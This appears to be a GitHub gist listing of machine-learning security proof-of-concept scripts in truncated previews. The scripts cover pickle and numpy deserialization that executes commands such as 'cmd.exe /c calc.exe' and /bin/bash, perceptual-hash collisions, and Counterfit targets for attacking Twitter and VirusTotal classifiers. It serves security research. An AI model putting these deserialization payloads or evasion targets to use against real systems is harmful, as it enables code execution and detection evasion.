- An Internet Connection
- Docker
- VirusTotal Account (username and password)
- The following headers, which can be gathered by examining the headers in Burp or DevTools.
- X-Recaptcha-Response
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %%javascript | |
| requirejs.config({ | |
| paths: { | |
| 'winnner': ['//cdn.jsdelivr.net/npm/canvas-confetti@1.5.1/dist/confetti.browser.min'], | |
| }, | |
| }); | |
| confetti({ | |
| particleCount: 300, | |
| startVelocity: 30, |
moohax
/ pandas_fi.py
Last active
August 26, 2022 12:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Requires fsspec. Sometimes installed, sometimes not. | |
| # -- | |
| # Remote | |
| # python -m http.server | |
| # | |
| # Serving HTTP on :: port 8000 (http://[::]:8000/) | |
| import pandas as pd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://numpy.org/doc/stable/reference/generated/numpy.array.html | |
| class ArrayExec: | |
| import os | |
| if os.name == 'nt': | |
| os.system("calc.exe") | |
| else: | |
| os.system("/bin/bash") | |
| def __array__(self): | |
| return 1 |
moohax
/ collisionLSH.py
Created
August 19, 2021 00:59
— forked from unrealwill/collisionLSH.py
Proof of Concept : generating collisions on a neural perceptual hash
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import tensorflow as tf #We need tensorflow 2.x | |
| import numpy as np | |
| #The hashlength in bits | |
| hashLength = 256 | |
| def buildModel(): | |
| #we can set the seed to simulate the fact that this network is known and doesn't change between runs | |
| #tf.random.set_seed(42) | |
| model = tf.keras.Sequential() |
moohax
/ twitter.py
Created
August 7, 2021 03:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Generated by counterfit # | |
| import requests | |
| import base64 | |
| from counterfit.core.targets import ArtTarget | |
| class Twitter(ArtTarget): | |
| model_name = "twitter" |
moohax
/ vt_target.md
Last active
August 19, 2021 13:39
moohax
/ virustotal.py
Last active
August 13, 2021 23:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Generated by counterfit # | |
| # code modified from https://github.com/monoxgas/FlyingAFalseFlag/blob/256197b78a8140d15df6e18b3221b637b5c3490a/Addendum/addendum.py | |
| import os | |
| import re | |
| import json | |
| import time | |
| import requests | |
| import numpy as np | |
| import tqdm |
moohax
/ cereal_poc.py
Created
October 19, 2020 03:31
Deserialization of custom class in pickle/numpy/PyTorch
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create a class - normally this is a machine learning model saved to disk | |
| class MLModel(): | |
| def __reduce__(self): | |
| import os | |
| execution = 'cmd.exe /c calc.exe' | |
| return (os.popen, (execution,)) | |
| # Serialize it. | |
| import pickle | |
| payload = pickle.dumps(MLModel()) |
moohax
/ cereal_web.py
Created
October 19, 2020 03:28
Example of deserialization for command exec through pickle
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle | |
| import base64 | |
| import requests | |
| from flask import Flask, request | |
| app = Flask(__name__) | |
| ## Start the server and go to 127.0.0.1:5000/exec ## | |
moohax
/ sandbox_detect.py
Last active
November 16, 2018 17:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import keras | |
| from keras import models | |
| from keras import layers | |
| from sklearn.preprocessing import StandardScaler, MinMaxScaler, LabelEncoder | |
| import numpy as np | |
| import keras.backend as K | |
| # Main | |
| np.random.seed(7) | |
| network = models.Sequential() |
NewerOlder